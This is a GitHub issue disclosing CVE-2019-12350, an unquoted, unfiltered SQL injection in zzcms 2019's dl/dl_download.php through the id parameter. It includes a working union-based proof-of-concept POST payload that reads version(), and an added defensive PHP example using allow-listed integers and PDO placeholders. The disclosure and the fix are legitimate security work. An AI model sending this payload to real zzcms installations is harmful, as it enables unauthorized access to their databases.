CVE-2019-12350: zzcms 2019 dl/dl_download.php SQL injection · Issue #4 · cby234/zzcms
An issue was discovered in zzcms 2019. SQL Injection exists in dl/dl_download.php via an id parameter value with a trailing comma.
Link URL : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (ZZCMS 2018 upgraded to 2019, 2019-01-11)
0x01 Vulnerability (/dl/dl_download.php, lines 67 ~ 71)
If the index of the ‘,’ character in the id parameter is greater than 0, the SQL will be
When we check the query, there are no single quotes around the id parameter, so we can inject
any query through the id parameter.
There is no security filter on the id parameter, which means an SQL query can be injected via
the id parameter by concatenating a ‘,’ value at the end of the id parameter.
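As an added, defender-side illustration that is not zzcms code and not part of this report: the query described above builds an IN (...) list from the id parameter by string concatenation, with no quoting and no filtering. The hardened form below, written in PHP, validates every element of id[] as a plain decimal integer and binds the values through PDO placeholders. The PDO connection $pdo, the function names, and the table name zzcms_dl (taken from the payload in this report) are assumptions.

```php
<?php
// Added example, not zzcms code. Hardened handling of an id[] request
// parameter before it reaches an IN (...) clause. Assumptions: an existing
// PDO connection $pdo and the table name zzcms_dl (from the report's payload).

/**
 * Keep only elements that are plain decimal integers. A value such as
 * "1) union select ... -- a," fails ctype_digit() and is discarded, so no
 * part of it can reach the SQL text.
 */
function sanitizeIdList(array $raw): array
{
    $ids = [];
    foreach ($raw as $value) {
        if (is_int($value)) {
            $value = (string) $value;
        }
        if (!is_string($value) || $value === '' || !ctype_digit($value)) {
            continue;
        }
        $ids[] = (int) $value;
    }
    return array_values(array_unique($ids));
}

/**
 * Fetch rows for the selected ids with one bound placeholder per value.
 * The id list is never concatenated into the query string, so a trailing
 * comma or any other token in the input cannot change the statement shape.
 */
function fetchDownloadsByIds(PDO $pdo, array $rawIds): array
{
    $ids = sanitizeIdList($rawIds);
    if ($ids === []) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare("SELECT * FROM zzcms_dl WHERE id IN ($placeholders)");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage in the request handler (the $_POST key mirrors the report's payload):
// $rows = fetchDownloadsByIds($pdo, (array) ($_POST['id'] ?? []));
```

Casting each element with intval() would also stop the payload shown in this report, but it would leave the query assembled by concatenation, which is exactly the pattern the report points at; the allow-list plus bound placeholders removes that pattern regardless of how the input is shaped.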
0x02 payload
Send the “POC” value below as the POST data to “/dl/dl_download.php”
POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,